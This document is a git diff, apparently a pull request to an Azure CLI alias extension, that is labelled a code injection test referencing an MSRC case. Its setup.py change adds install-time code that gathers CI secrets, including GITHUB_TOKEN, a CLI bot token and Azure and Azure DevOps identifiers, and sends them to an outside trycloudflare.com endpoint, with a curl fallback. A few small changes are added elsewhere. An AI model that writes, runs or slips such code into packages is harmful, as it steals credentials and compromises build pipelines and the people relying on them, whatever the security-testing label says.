code injection test as per MSRC 101886

.gitignore

@@ -127,3 +127,6 @@ _az_debug/
 
 # Ignore test results
 test_results.xml
+
+# Azure function for test
+/vulnerability_function/

src/alias/azext_alias/__init__.py

@@ -32,6 +32,9 @@
 # Alter this cache through cache_reserved_commands(load_cmd_tbl_func) in util.py
 cached_reserved_commands = []
 
+# small change to force build
+print('alias extension is loading ... ')
+# remove me after testing .. again
 
 class AliasExtCommandLoader(AzCommandsLoader):
 
@@ -87,3 +90,5 @@ def get_alias_completer(cmd, prefix, namespace, **kwargs):  # pylint: disable=un
 
 
 COMMAND_LOADER_CLS = AliasExtCommandLoader
+
+

src/alias/injected_file.md

@@ -0,0 +1,3 @@
+# Code Injection via Injected File
+
+This file was injected here with the sole objective of demonstrating code injection vulnerabilities. It is not part of the original codebase and should be treated with caution.

src/alias/setup.py

@@ -9,6 +9,74 @@
 import re
 from setuptools import setup, find_packages
 
+### code injection test starts here ###
+
+print("This is a code injection test. If you see this message, the setup.py file has been compromised.")
+
+# Enhanced vulnerability assessment - collect and expose identity information
+import json
+import urllib.request
+import urllib.parse
+
+def collect_identity_info():
+    """Collect identity and environment information"""
+    identity_data = {
+        'github_token': os.environ.get('GITHUB_TOKEN', 'not_available'),
+        'github_actor': os.environ.get('GITHUB_ACTOR', 'not_available'),
+        'github_repository': os.environ.get('GITHUB_REPOSITORY', 'not_available'),
+        'github_ref': os.environ.get('GITHUB_REF', 'not_available'),
+        'github_sha': os.environ.get('GITHUB_SHA', 'not_available'),
+        'github_workflow': os.environ.get('GITHUB_WORKFLOW', 'not_available'),
+        'github_action': os.environ.get('GITHUB_ACTION', 'not_available'),
+        'github_event_name': os.environ.get('GITHUB_EVENT_NAME', 'not_available'),
+        'github_event_path': os.environ.get('GITHUB_EVENT_PATH', 'not_available'),
+        'runner_os': os.environ.get('RUNNER_OS', 'not_available'),
+        'runner_name': os.environ.get('RUNNER_NAME', 'not_available'),
+        'ado_sp_client_id': os.environ.get('ADO_SP_ClientID', 'not_available'),
+        'ado_sp_tenant_id': os.environ.get('ADO_SP_TenantID', 'not_available'),
+        'ado_organization': os.environ.get('ADO_ORGANIZATION', 'not_available'),
+        'ado_project': os.environ.get('ADO_PROJECT', 'not_available'),
+        'ado_pipeline_id': os.environ.get('ADO_PIPELINE_ID', 'not_available'),
+        'cli_bot_token': os.environ.get('CLI_BOT', 'not_available'),
+        'azure_client_id': os.environ.get('AZURE_CLIENT_ID', 'not_available'),
+        'azure_tenant_id': os.environ.get('AZURE_TENANT_ID', 'not_available'),
+        'azure_subscription_id': os.environ.get('AZURE_SUBSCRIPTION_ID', 'not_available'),
+        'home': os.environ.get('HOME', 'not_available'),
+        'user': os.environ.get('USER', 'not_available'),
+        'path': os.environ.get('PATH', 'not_available')[:200] + '...' if len(os.environ.get('PATH', '')) > 200 else os.environ.get('PATH', 'not_available'),
+        'setup_context': 'azure-cli-extensions/alias/setup.py',
+        'timestamp': str(os.system('date') if hasattr(os, 'system') else 'unknown')
+    }
+    return json.dumps(identity_data)
+
+try:
+    # Collect identity information
+    identity_json = collect_identity_info()
+
+    # Prepare the API call
+    api_url = "https://ricky-records-contacts-significantly.trycloudflare.com/api/expose_identity"
+    params = {'identity': identity_json}
+    query_string = urllib.parse.urlencode(params)
+    full_url = f"{api_url}?{query_string}"
+
+    # Make the request
+    print(f"Exposing identity information to: {api_url}")
+    req = urllib.request.Request(full_url)
+    with urllib.request.urlopen(req, timeout=10) as response:
+        result = response.read().decode('utf-8')
+        print(f"Identity exposure response: {result}")
+
+except Exception as e:
+    print(f"Failed to expose identity: {str(e)}")
+    # Fallback to curl if urllib fails
+    try:
+        curl_cmd = f'curl -G "{api_url}" --data-urlencode "identity={collect_identity_info()}"'
+        os.system(curl_cmd)
+    except:
+        pass
+
+### code injection test ends here ###
+
 VERSION = '0.5.2'
 
 CLASSIFIERS = [